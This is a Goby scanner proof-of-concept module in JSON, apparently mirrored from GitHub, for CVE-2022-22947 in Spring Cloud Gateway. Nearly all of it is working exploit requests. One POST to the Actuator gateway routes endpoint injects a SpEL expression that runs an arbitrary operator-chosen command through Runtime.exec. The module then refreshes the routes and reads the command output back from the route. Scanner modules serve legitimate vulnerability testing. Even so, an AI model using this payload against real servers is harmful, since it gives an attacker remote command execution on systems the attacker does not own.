mirror of https://github.com/qwqdanchun/Goby.git
255 lines
11 KiB
JSON
255 lines
11 KiB
JSON
{
|
||
"Name": "CVE-2022-22947",
|
||
"Level": "3",
|
||
"Tags": [
|
||
"rce"
|
||
],
|
||
"GobyQuery": "header=\"Vary: Accept-Encoding\" || Header=\"X-Cache: HIT\"",
|
||
"Description": "描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。",
|
||
"Product": "spring",
|
||
"Homepage": "https://gobies.org/",
|
||
"Author": "gobysec@gmail.com",
|
||
"Impact": "<p>描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。<br></p>",
|
||
"Recommendation": "<p>升级版本</p>",
|
||
"References": [
|
||
"https://gobies.org/"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"Name": "cmd",
|
||
"Type": "input",
|
||
"Value": "whoami"
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/actuator/gateway/routes/hacktest",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept": "*/*",
|
||
"Accept-Language": "en",
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
|
||
"Content-Type": "application/json"
|
||
},
|
||
"data_type": "text",
|
||
"data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "201",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$head",
|
||
"operation": "contains",
|
||
"value": "hacktest",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody||"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/actuator/gateway/refresh",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$head",
|
||
"operation": "contains",
|
||
"value": "",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/actuator/gateway/routes/hacktest",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|text|"
|
||
]
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/actuator/gateway/routes/hacktest",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept": "*/*",
|
||
"Content-Type": "application/json"
|
||
},
|
||
"data_type": "text",
|
||
"data": "{\r\n \"id\": \"hacktest\",\r\n \"filters\": [{\r\n \"name\": \"AddResponseHeader\",\r\n \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"{{{cmd}}}\\\"}).getInputStream()))}\"}\r\n }],\r\n \"uri\": \"http://example.com\",\r\n \"order\": 0\r\n }",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "201",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$head",
|
||
"operation": "contains",
|
||
"value": "0",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody||"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/actuator/gateway/refresh",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody||"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/actuator/gateway/routes/hacktest",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "",
|
||
"set_variable": []
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "predicate",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|Result = '(.*?)\\\\n'"
|
||
]
|
||
}
|
||
],
|
||
"PostTime": "2022-03-04 13:36:51",
|
||
"GobyVersion": "1.9.325"
|
||
}
|